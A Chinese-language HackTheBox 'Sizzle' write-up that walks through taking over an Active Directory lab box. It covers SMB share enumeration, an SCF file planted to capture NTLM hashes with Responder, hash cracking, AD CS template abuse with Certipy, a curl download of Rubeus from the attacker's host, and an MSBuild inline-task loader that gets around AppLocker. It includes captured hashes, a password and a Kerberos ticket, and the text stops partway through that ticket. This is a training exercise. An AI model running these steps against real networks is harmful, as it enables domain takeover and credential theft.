HTB Sizzle - Windows
Insane 难度的靶机。非预期路径。枚举共享目录的权限以执行 SCF 攻击 SMB,并利用域控制器(DC)的证书颁发(CA)服务来使用 WinRM,使用证书模板的错误配置直接获得 system 权限。
HTB:
Sizzle is an "Insane" difficulty WIndows box with an Active Directory environment. A writable directory in an SMB share allows to steal NTLM hashes which can be cracked to access the Certificate Services Portal. A self signed certificate can be created using the CA and used for PSRemoting. A SPN associated with a user allows a kerberoast attack on the box. The user is found to have Replication rights which can be abused to get Administrator hashes via DCSync.
这部靶机现在看已经有些过时,但是在利用 ADCS 模板注入提权的过程中碰到了很多问题,也学到了很多对我来讲新的东西。如有描述或技术错误,请指出。
信息搜集
nmap
$ nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.6.66
Nmap scan report for sizzle.HTB.LOCAL (10.129.6.66)
Host is up (0.26s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49692/tcp open unknown
49695/tcp open unknown
49710/tcp open unknown
49714/tcp open unknown
49740/tcp open unknown
$ nmap -sU --top-ports 500 -oA nmapscan/udp 10.129.6.66
Nmap scan report for sizzle.HTB.LOCAL (10.129.6.66)
Host is up (0.25s latency).
Not shown: 496 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
$ nmap -sT -sC -sV -O -p21,53,80,135,139,389,443,445,464,593,636,3268,3269,5985,5986,9389,47001,49664,49665,49666,49669,49671,49688,49689,49692,49695,49710,49714 -oA nmapscan/detail 10.129.6.66
Nmap scan report for sizzle.HTB.LOCAL (10.129.6.66)
Host is up (0.45s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date:
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after: 2022-02-11T12:59:51
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2026-03-17T07:08:44+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after: 2022-02-11T12:59:51
|_ssl-date:
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date:
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after: 2022-02-11T12:59:51
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date:
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after: 2022-02-11T12:59:51
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date:
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2021-02-11T12:59:51
|_Not valid after: 2022-02-11T12:59:51
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016|2008|7 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2016 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date:
|_ start_date:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
现在我们有域名,将其添加到 hosts 文件:
sizzle.htb.local htb.local SIZZLE
smb
查看 smb 共享:
$ smbclient -L '//10.129.6.66/' -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
Department Shares Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Operations Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
查看 Department Shares:
$ smbclient '//10.129.6.66/Department Shares' -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 3 23:22:32 2018
.. D 0 Tue Jul 3 23:22:32 2018
Accounting D 0 Tue Jul 3 03:21:43 2018
Audit D 0 Tue Jul 3 03:14:28 2018
Banking D 0 Tue Jul 3 23:22:39 2018
CEO_protected D 0 Tue Jul 3 03:15:01 2018
Devops D 0 Tue Jul 3 03:19:33 2018
Finance D 0 Tue Jul 3 03:11:57 2018
HR D 0 Tue Jul 3 03:16:11 2018
Infosec D 0 Tue Jul 3 03:14:24 2018
Infrastructure D 0 Tue Jul 3 03:13:59 2018
IT D 0 Tue Jul 3 03:12:04 2018
Legal D 0 Tue Jul 3 03:12:09 2018
M&A D 0 Tue Jul 3 03:15:25 2018
Marketing D 0 Tue Jul 3 03:14:43 2018
R&D D 0 Tue Jul 3 03:11:47 2018
Sales D 0 Tue Jul 3 03:14:37 2018
Security D 0 Tue Jul 3 03:21:47 2018
Tax D 0 Tue Jul 3 03:16:54 2018
Users D 0 Wed Jul 11 05:39:32 2018
ZZ_ARCHIVE D 0 Wed Mar 18 15:25:04 2026
7779839 blocks of size 4096. 3764087 blocks available
递归查看全部文件:
smb: \> recurse ON
smb: \> ls
Users 里有一些用户名:
\Users
. D 0 Wed Jul 11 05:39:32 2018
.. D 0 Wed Jul 11 05:39:32 2018
amanda D 0 Tue Jul 3 03:18:43 2018
amanda_adm D 0 Tue Jul 3 03:19:06 2018
bill D 0 Tue Jul 3 03:18:28 2018
bob D 0 Tue Jul 3 03:18:31 2018
chris D 0 Tue Jul 3 03:19:14 2018
henry D 0 Tue Jul 3 03:18:39 2018
joe D 0 Tue Jul 3 03:18:34 2018
jose D 0 Tue Jul 3 03:18:53 2018
lkys37en D 0 Wed Jul 11 05:39:04 2018
morgan D 0 Tue Jul 3 03:18:48 2018
mrb3n D 0 Tue Jul 3 03:19:20 2018
Public D 0 Tue Jul 3 03:19:14 2018
提取这些用户名,使用 kerbrute 发现只有一个有效用户amanda。尝试 ASREPRoasting 攻击,GetNPUsers.py 显示网络超时,这应该和目标只开放了 udp 88端口有关。尝试修改 GetNPUsers ,但最后发现amanda并未关闭预认证。
ZZ_ARCHIVE 里有很多文件:
\ZZ_ARCHIVE
. D 0 Wed Mar 18 15:25:04 2026
.. D 0 Wed Mar 18 15:25:04 2026
AddComplete.pptx A 419430 Tue Jul 3 03:32:58 2018
AddMerge.ram A 419430 Tue Jul 3 03:32:57 2018
ConfirmUnprotect.doc A 419430 Tue Jul 3 03:32:57 2018
ConvertFromInvoke.mov A 419430 Tue Jul 3 03:32:57 2018
ConvertJoin.docx A 419430 Tue Jul 3 03:32:57 2018
CopyPublish.ogg A 419430 Tue Jul 3 03:32:57 2018
...[省略]...
将其全部下载到本地分析:
smb: \> prompt OFF # 关闭每个文件的确认提示
smb: \> lcd /local/path/to/save # 设置本地保存路径
smb: \> mget ZZ_ARCHIVE # 下载整个目录
所有文件似乎都损坏了,无法真正打开。
FTP
FTP 允许匿名登录,但目录是空的:
$ ftp 10.129.6.66
Connected to 10.129.6.66.
220 Microsoft FTP Service
Name (10.129.6.66:meraki): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||55210|)
150 Opening ASCII mode data connection.
226 Transfer complete.
Web
80端口只有一张滋滋冒油的牛排图片。
查看页面源代码,并手动访问 readme.txt 等文件,没有任何结果。
进行漫长的目录爆破:
./feroxbuster -u http://10.129.6.66/ -w /usr/share/wordlists/directory-list-2.3-medium.txt
./feroxbuster -u http://10.129.6.66/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x bak,mdb,aspx,asp,ashx,asmx,svc,config,xml,json,log
./feroxbuster -u http://10.129.6.66/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/Web-Servers/IIS.txt
几乎都是404页面。只通过 IIS.txt 文件发现一个路径 certsrv/ 。certsrv/ 是微软 Active Directory 证书服务(AD CS)提供的一个Web管理注册页面。简单来说,它是一个让用户通过浏览器来申请和管理证书的网站入口。
此路径需要身份验证。通过 wfuzz 等工具可以进行爆破。
$ wfuzz -c -z file,/usr/share/wordlists/rockyou.txt \
--ntlm "HTB.LOCAL\amanda:FUZZ" \
--sc 200,403,301,302 \
-u http://10.129.6.66/certsrv/
很遗憾,等待了一段时间之后服务器超时了,或许我需要设置并发线程和额外的等待时间,但HTB 应该很少有需要大量爆破的场景。先记下这里,以后需要的时候再回来。
LDAP
到这里我们已经没有太多攻击面了,现在把希望放在 LDAP 身上。但可惜的是,LDAP需要认证:
$ nxc ldap sizzle.htb.local -p '' -u '' --users
LDAP 10.129.6.66 389 SIZZLE [*] Windows 10 / Server 2016 Build 14393 (name:SIZZLE) (domain:HTB.LOCAL) (signing:None) (channel binding:Never)
LDAP 10.129.6.66 389 SIZZLE [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
LDAP 10.129.6.66 389 SIZZLE [+] HTB.LOCAL\:
LDAP 10.129.6.66 389 SIZZLE [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
NTLM嗅探
现在还可以做哪些?最后再枚举一下 SMB 目录吧,如果找到一个可写目录,就能上传恶意文件,如果用户打开此文件,就能窃取其哈希。
将 SMB 挂载到本地,进入共享,然后从当前位置递归查看可写目录。
$ find . -type d -exec sh -c 'mkdir "$1/test_p" 2>/dev/null && { echo "[+] $1"; rmdir "$1/test_p"; }' _ {} \;
[+] ./Users/Public
[+] ./ZZ_ARCHIVE
找到两个可写目录。在 /Users/Public 和 /ZZ_ARCHIVE 中创建文件然后通过 watch命令观察是否自动被删除。
$ watch -d ls
结果发现 /Users/Public 目录下的文件会自动被删除。既然如此,我们可以通过 SCF 文件窃取其哈希。
当 Windows 资源管理器解析文件图标时,会自动访问
IconFile中定义的路径。如果我们将IconFile指向一个不存在的 SMB 路径,就会导致系统去解析该 SMB 路径。
将准备好的 SCF 文件上传到 /Users/Public ,同时开启 responder
[Shell]
Command=2
IconFile=\\10.10.16.5\share
[Taskbar]
Command=Explorer
/Users/Public $ ls
1.scf
$ sudo responder -I tun0 -wd
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[*] Sponsor this project: [USDT: TNS8ZhdkeiMCT6BpXnj4qPfWo3HpoACJwv] , [BTC: 15X984Qco6bUxaxiR8AmTnQQ5v1LJ2zpNo]
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.5]
Responder IPv6 [dead:beef:4::1003]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-V8G2WPZMTJC]
Responder Domain Name [R828.LOCAL]
Responder DCE-RPC Port [47829]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[+] Listening for events...
[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 636, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.129.6.66
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:1122334455667788:90063EB83418BD47057394F4933895FA:0101000000000000805C20E1E6B6DC017566B9E53D8D80A60000000002000800520038003200380001001E00570049004E002D005600380047003200570050005A004D0054004A00430004003400570049004E002D005600380047003200570050005A004D0054004A0043002E0052003800320038002E004C004F00430041004C000300140052003800320038002E004C004F00430041004C000500140052003800320038002E004C004F00430041004C0007000800805C20E1E6B6DC0106000400020000000800300030000000000000000100000000200000D22E1D4656A511DC780407CE181584B08CF53E55E4E2C4D34C9B3C7966F081360A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003500000000000000000000000000
[+] Exiting...
将哈希保存在文件当中然后破解:
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
AMANDA::HTB:1122334455667788:90063eb83418bd47057394f4933895fa:0101000000000000805c20e1e6b6dc017566b9e53d8d80a60000000002000800520038003200380001001e00570049004e002d005600380047003200570050005a004d0054004a00430004003400570049004e002d005600380047003200570050005a004d0054004a0043002e0052003800320038002e004c004f00430041004c000300140052003800320038002e004c004f00430041004c000500140052003800320038002e004c004f00430041004c0007000800805c20e1e6b6dc0106000400020000000800300030000000000000000100000000200000d22e1d4656a511dc780407ce181584b08cf53e55e4e2c4d34c9b3c7966f081360a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003500000000000000000000000000:Ashare1972
爆破成功!获得了一组凭据 amanda:Ashare1972,通过 evil-winrm 尝试登录。但无论使用 http 还是 https,evil-winrm 都出现了认证错误。
证书与密钥
现在可以使用凭据访问 certsrv/ ,我们可以使用一对公钥和私钥证书尝试登录 winrm 。生成需要的文件:
# 生成一个 4096 位的 RSA 私钥
$ openssl genrsa -out amanda.key 4096
# 使用私钥创建一个新的证书签名请求(CSR)
$ openssl req -new -key amanda.key -out amanda.csr
证书签名请求(CSR) 是一个包含了申请者(如用户、服务器)标识信息(如专有名称)及其公钥的加密编码后的文件。申请者使用自己的私钥对该文件进行数字签名,以证明对该私钥的拥有权。申请者将 CSR 提交给证书颁发机构(CA),CA 在验证申请者身份后,会使用自己的私钥对 CSR 中的公钥和身份信息进行签名,从而生成一个数字证书。该证书将申请者的身份与其公钥绑定在一起,可供任何依赖方用于加密数据或验证签名。
我们访问 /certsrv 目录 -> 请求证书 -> 高级证书请求。将 amanda.csr 文件的内容粘贴到 Saved Request 字段,然后提交证书请求,会下载一个amanda.cer文件。
现在我们拥有了访问 winrm 的两个文件,amanda.cer 和 amanda.key ,可以尝试登录:
# 通过证书登录必须使用 SSL
$ evil-winrm -i 10.129.6.66 -c amanda.cer -k amanda.key -S -P 5986
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\amanda\Documents>
由此,我们获得了在目标系统的第一个立足点。
滥用模板
目标有证书服务,尝试利用ADCS证书模板注入进行提权。这里有两个很好用的工具,Certipy 和 Certify ,Certipy 无需上传到目标主机,可以远程运行,所以我们选择 Certipy。
# 查找易受攻击的配置
certipy find -username amanda@HTB.LOCAL -target 10.129.6.66 -dc-ip 10.129.6.66 -p 'Ashare1972' -vulnerable -hide-admins -enabled -stdout
...[省略]...
[!] Vulnerabilities
ESC4 : User has dangerous permissions.
目标的 ESC4 模板可被劫持。简单来讲我们可以修改其配置,这种修改可能将一个原本安全的模板转变为容易受到其他攻击场景威胁的模板,最常见的是 ESC1 或 ESC2 。
根据官方文档,我们最后修改模板配置为 ESC1 ,并为管理员申请证书。
$ certipy req -username amanda@HTB.LOCAL -target 10.129.6.66 -dc-ip 10.129.6.66 -p 'Ashare1972' -template SSL -ca 'HTB-SIZZLE-CA' -upn 'administrator@htb.local' -sid 'S-1-5-21-2379389067-1826974543-3574127760-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 31
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@htb.local'
[*] Certificate object SID is 'S-1-5-21-2379389067-1826974543-3574127760-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Certipy 加载 PFX,执行 PKINIT 以获取管理员的 Kerberos TGT,甚至尝试检索 NTLM 哈希:
$ certipy auth -pfx 'administrator.pfx' -dc-ip '10.129.6.66'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@htb.local'
[*] SAN URL SID: 'S-1-5-21-2379389067-1826974543-3574127760-500'
[*] Using principal: 'administrator@htb.local'
[*] Trying to get TGT...
certipy 卡在获取 TGT 这一步。很大可能是因为 88/tcp 未开放,现在只能上传 Rubeus.exe 在目标机器上获取 TGT 和 NTLM 哈希。
AppLocker 绕过
上传 Rubeus.exe ,发现系统有安全防护,当前处于受限语言模式(Constrained Language Mode):
*Evil-WinRM* PS C:\programdata> upload Rubeus.exe
Info: Uploading /path/Rubeus.exe to C:\programdata\Rubeus.exe
Error: Upload failed. Check filenames or paths: [WinRM::FS::Core::FileTransporter] Upload failed (exitcode: 0), but stderr present
Cannot invoke method. Method invocation is supported only on core types in this language mode.
At line:51 char:12
+ return $ExecutionContext.SessionState.Path.GetUnresolvedProviderP ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodInvocationNotSupportedInConstrainedLanguage
Cannot bind argument to parameter 'Path' because it is null.
At line:19 char:18
+ if(Test-Path $dst -PathType Container) {
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
Cannot bind argument to parameter 'Path' because it is null.
At line:24 char:41
+ chk_exists = ($exists = Test-Path $dst -PathType Leaf)
+ ~~~~
+ CategoryInfo : InvalidData: (:) [Test-Path], ParameterBindingValidationException
+ FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Microsoft.PowerShell.Commands.TestPathCommand
PowerShell的语言模式是一种安全机制,它决定了在当前的PowerShell会话中,你可以使用哪些语言元素和功能。受限语言模式的出现,是PowerShell自身演进和安全需求共同作用的结果。早期(2006年及以前)在PowerShell诞生之前,Windows管理员主要依靠cmd.exe和Windows Script Host(WSH,如VBScript)来进行自动化管理。但这些工具有明显的缺点,比如处理对象能力弱、脚本复杂、以及存在严重的安全漏洞(例如,病毒经常利用WSH传播)。微软在2006年发布了PowerShell 1.0。它基于强大的.NET框架,能够处理对象,极大地提升了管理效率。然而,正是这种强大的能力,也让它成为了攻击者的目标。攻击者开始利用PowerShell执行无文件攻击、代码注入等恶意行为。约2012年,为了应对日益增长的威胁,微软需要在“强大功能”和“系统安全”之间找到平衡。因此,在PowerShell 3.0中引入了受限语言模式。它的设计初衷是:当一个受应用程序控制策略(如AppLocker或Windows Defender Application Control, WDAC)约束的用户运行PowerShell时,自动将会话切换到ConstrainedLanguage模式。这样一来,即使是攻击者控制了用户权限,也无法利用PowerShell的高级功能来执行恶意代码或加载未授权的程序集,从而极大地提高了系统的安全性。
$ExecutionContext.SessionState.LanguageMode 即可查看当前会话的语言模式。
但可以通过 curl 下载 Rubeus:
*Evil-WinRM* PS C:\programdata> curl http://10.10.16.5/Rubeus.exe -o 1.exe
执行 Rubeus :
*Evil-WinRM* PS C:\programdata> ./1.exe
Program '1.exe' failed to run: This program is blocked by group policy. For more information, contact your system
发现执行动作被 AppLocker 拦截,我们可以查看其配置:
*Evil-WinRM* PS C:\programdata> Get-AppLockerPolicy -Effective -Xml
...[省略]...
<FilePathRule ... UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="%OSDRIVE%\tmp\*"/>
</Conditions>
</FilePathRule>
...[省略]...
这代表任何人都可以在 C:\tmp 目录下运行可执行程序,但 tmp 目录并不存在。现在考虑尝试绕过 AppLocker。
Living Off the Land:当目标系统用 AppLocker 这样的白名单策略限制了未知程序的运行时,我们倾向于寻找那些系统本身允许运行、且由微软官方签名的程序来执行恶意代码。MSBuild.exe 就是这类程序的一个典型代表。
MSBuild 支持“内联任务”,允许在 XML 项目文件中直接嵌入并执行 C# 代码。系统检查的是 MSBuild.exe 这个“代理”的身份,而不会去阻止它在内存中编译和执行的内联任务。恶意代码实际上运行在 MSBuild 这个可信进程的内部,从而绕过了 AppLocker 对未知 .exe 文件的检测。
把 Rubeus 彻底“液态化”——将其转化为 Base64 字符串存在文本里,由 MSBuild.exe 读取后直接在内存中“重组”并运行。
在攻击机执行:
$ base64 -w 0 Rubeus.exe > rubeus_b64.txt
之前生成 PFX 文件没有设置密码,我们需要设置一个密码,避免 .NET 对空密码的处理歧义。而且我们使用的 OpenSSL 版本较新,生成 .pfx 时默认使用最新的加密算法(如 AES256-SHA256),目标系统较老,它运行的 .NET 4.0/4.6 根本识别不了这些新算法,所以需要做一个高兼容性的 PFX。
# 从旧的 pfx 直接转换(需要先提取再重新打包)
openssl pkcs12 -in administrator.pfx -nodes -out temp.pem
openssl pkcs12 -export -in temp.pem -out legacy_admin.pfx -password pass:1234 -legacy rm temp.pem
以下是 xml 代码,会读取磁盘上的 rubeus_b64.txt,在内存中加载并执行 asktgt 命令。
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="ExecuteRubeusInMemory">
<RubeusTask />
</Target>
<UsingTask
TaskName="RubeusTask"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Reflection;
using System.IO;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class RubeusTask : Task, ITask
{
public override bool Execute()
{
try {
string b64Path = @"C:\programdata\rubeus_b64.txt";
if (!File.Exists(b64Path)) {
Console.WriteLine("[-] error: not found rubeus_b64.txt");
return false;
}
Console.WriteLine("[*] read Base64.txt...");
string b64Data = File.ReadAllText(b64Path);
byte[] rubeusBytes = Convert.FromBase64String(b64Data);
Console.WriteLine("[*] (Reflection Load)...");
Assembly rubeusAssembly = Assembly.Load(rubeusBytes);
string[] rubeusArgs = new string[] {
"asktgt",
"/user:administrator",
"/domain:htb.local",
"/dc:10.129.6.66",
"/certificate:C:\\programdata\\legacy_admin.pfx",
"/password:1234",
"/getcredentials",
"/outfile:C:\\programdata\\admin.kirbi"
};
Console.WriteLine("[*] Rubeus start...");
Console.WriteLine("--------------------------------------");
rubeusAssembly.EntryPoint.Invoke(null, new object[] { rubeusArgs });
Console.WriteLine("--------------------------------------");
Console.WriteLine("[+] okkk! NTLM Hash。");
return true;
}
catch (Exception ex) {
Console.WriteLine("[-] 发生异常: " + ex.Message);
if (ex.InnerException != null) {
Console.WriteLine("[-] 内部异常: " + ex.InnerException.Message);
}
return false;
}
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
上传 payload.xml 、legacy_admin.pfx 和 rubeus_b64.txt 到靶机的 `C:\programdata\
现在执行 MSBuild.exe:
*Evil-WinRM* PS C:\programdata> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\programdata\payload.xml
Microsoft (R) Build Engine version 4.6.1586.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
[*] read Base64.txt...
[*] (Reflection Load)...
[*] Rubeus start...
--------------------------------------
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Amanda
[*] Building AS-REQ (w/ PKINIT preauth) for: 'htb.local\administrator'
[*] Using domain controller: 10.129.6.66:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFujCCBbagAwIBBaEDAgEWooIE0zCCBM9hggTLMIIEx6ADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIB
AqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4IEkTCCBI2gAwIBEqEDAgECooIEfwSCBHsmXmLJQtFIctxa
h3V5dEQohq6u15DrQMKIkgGDfhb7Pr4Hm44R42FcXGdJrKJcCX7pNjMxpRk+C4xUNxBFcerCkrtXOUlm
wsd6k2cDqkXaVmSZ/8YNY0lEYClQLxr7CgTK0j5scRs2eX9cLcvZwkUL/oegbiRFW9F5I7i98EmnanIm
8ZcDSvcHrxWR9zHltHgOR7Cg/Nfw5sVR3ocQ3ouwDsjk3uYE628tJU2XFZwmw3a0M2M0Dd9pJVVd9gxY
Aflhn4zPgouNT6sts6qNBmgqPaWMBlSFqAjQJHkbU4St2fcQ1nrYgVUSrKdMmK63E9f0JWoQS2hvhAzk
HxcMY5kh6YQqj7d/6yaXc3VLJz48F4gyoiWAtFcCxLjO/0MNgu8H1dA5kxx4avYfBHmsRCabxEcJ2rsK
R2qTKopZBZF891s2wUV+Mw4yfmsM6rDJDDNdSKY7+ncKJ/OgnmzUpq1pHdaUekf7oe2ChXUJSNkvskut
XBh7dFPc4xHF0vJuB83v3yKksRZTepNzCJJzRzGaUUDKJIb1xA2OQkn4gpcqRN3TCWQas1b8AQM0egkR
RpglhE+YNwFBSKxuwuTXqFfRPor8p+KDzlQmVM24HgaJb3zdg3opKARHBNmRvQGw8p6RfeCOp1gjuvie
